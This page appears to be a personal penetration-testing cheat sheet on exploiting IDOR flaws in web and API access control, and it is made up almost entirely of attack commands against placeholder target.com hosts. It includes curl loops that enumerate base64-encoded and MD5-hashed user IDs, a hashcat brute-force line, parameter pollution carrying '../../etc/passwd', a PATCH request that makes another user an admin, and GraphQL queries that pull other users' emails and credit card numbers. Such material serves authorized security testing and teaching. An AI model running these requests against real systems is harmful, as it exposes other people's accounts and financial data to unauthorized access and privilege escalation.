b0ysie7e

Appearance

Identifying IDORs

Simple Parameter Manipulation

c
# Numeric ID increment
curl -u user1:pass1 http://api.target.com/v1/users/123/profile
curl -u user1:pass1 http://api.target.com/v1/users/124/profile

# UUID/hash prediction
curl -u user1:pass1 http://api.target.com/v1/users/550e8400-e29b-41d4-a716-446655440000/profile
curl -u user1:pass1 http://api.target.com/v1/users/550e8400-e29b-41d4-a716-446655440001/profile

Parameter Pollution

c
# Multiple ID parameters
curl "http://target.com/download?file_id=legit123&file_id=admin456"
curl "http://target.com/api?user_id=valid123&user_id=victim789"

AJAX Calls

javascript
function changeUserPassword() {
    $.ajax({
        url:"change_password.php",
        type: "post",
        dataType: "json",
        data: {uid: user.uid, password: user.password, is_admin: is_admin},
        success:function(result){
            //
        }
    });
}

Understand Hashing/Encoding

javascript
$.ajax({
    url:"download.php",
    type: "post",
    dataType: "json",
    data: {filename: CryptoJS.MD5('file_1.pdf').toString()},
    success:function(result){
        //
    }
});

Compare User Roles

json
{
  "attributes" : 
    {
      "type" : "salary",
      "url" : "/services/data/salaries/users/1"
    },
  "Id" : "1",
  "Name" : "User1"

}

IDOR Enumeration

Basic ID Enumeration

Numeric ID Increment/Decrement

c
# Example: User profile access
curl "https://target.com/api/user/101"   # Valid request (your account)
curl "https://target.com/api/user/102"   # Check another user
curl "https://target.com/api/user/100"   # Check previous ID
curl "https://target.com/api/user/099"   # Leading zero test

UUID/GUID Manipulation

c
# Predictable UUIDs (v1/v2) can be brute-forced
curl "https://target.com/api/invoice/550e8400-e29b-41d4-a716-446655440000"
curl "https://target.com/api/invoice/550e8400-e29b-41d4-a716-446655440001"

Hash Cracking (If IDs Are Obfuscated)

c
# If IDs look like hashes (e.g., `d4d4d4d4`), try:
curl "https://target.com/api/doc/d4d4d4d4"  # Original
curl "https://target.com/api/doc/a1b2c3d4"  # Brute-force attempt

Parameter Fuzzing

Changing Parameter Names

c
# Try different parameter names:
curl "https://target.com/profile?id=100"
curl "https://target.com/profile?user_id=100"
curl "https://target.com/profile?uid=100"
curl "https://target.com/profile?account=100"

HTTP Parameter Pollution (HPP)

c
# Supply multiple parameters to confuse access control
curl "https://target.com/download?file=legit.pdf&file=../../etc/passwd"
curl "https://target.com/api?user=alice&user=bob"

Bypassing Encoded/Obscured IDs

Base64-Encoded IDs

c
# Example: /user/MTIz (where "MTIz" = Base64 of "123")
echo "123" | base64  # Returns "MTIz"
curl "https://target.com/api/user/MTIz"  # Original
curl "https://target.com/api/user/MTI0"  # Incremented (124)
c
for i in {100..110}; do 
    encoded=$(echo -n $i | base64 | tr -d '\n')
    curl -s "https://target.com/api/user/$encoded" | grep "email"
done

Hashed IDs (MD5, SHA1, etc.)

c
# If user_id looks like a hash (e.g., "5f4dcc3b5aa765d61d8327deb882cf99" = MD5("password"))
echo -n "101" | md5sum | cut -d' ' -f1  # Returns hash of "101"
curl "https://target.com/api/user/$(echo -n '102' | md5sum | cut -d' ' -f1)"
c
hashcat -m 0 -a 3 "5f4dcc3b5aa765d61d8327deb882cf99" ?d?d?d  # Brute-force 3-digit MD5

Custom Encoding (e.g., XOR, Bit-Shifting)

c
# If user_id=246 corresponds to real_id=118 (246 = 118*2 + 10)
real_id = (246 - 10) // 2  # Returns 118

IDOR in Insecure APIs

REST API IDOR

c
# Numeric ID increment
curl "https://api.target.com/v1/users/101"
curl "https://api.target.com/v1/users/102"

# UUID manipulation
curl "https://api.target.com/v1/invoices/550e8400-e29b-41d4-a716-446655440000"
curl "https://api.target.com/v1/invoices/550e8400-e29b-41d4-a716-446655440001"

# Using PUT/PATCH to modify other users
curl -X PATCH "https://api.target.com/v1/users/102" -d '{"role":"admin"}'

GraphQL IDOR

c
# Query other users' data
query {
  user(id: "encoded_user_id_here") {
    email
    creditCards { number }
  }
}

# Batch query attack
query {
  user1: user(id: "encoded_id_1") { email }
  user2: user(id: "encoded_id_2") { email }
}

SOAP API IDOR (XML)

c
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetUserDetails>
      <userId>ENCODED_ID_HERE</userId>
    </GetUserDetails>
  </soap:Body>
</soap:Envelope>

Bypassing Protections

Swapping HTTP Methods

c
# If GET is blocked, try POST
curl -X POST "https://target.com/api/user/ENCODED_ID"

Adding Headers (API Key Spoofing)

c
curl -H "X-API-Key: 12345" "https://target.com/api/user/ENCODED_ID"

Parameter Pollution

c
# If `user_id` is checked, try `account_id`, `uid`, etc.
curl "https://target.com/api/data?user_id=VALID_ID&account_id=VICTIM_ID"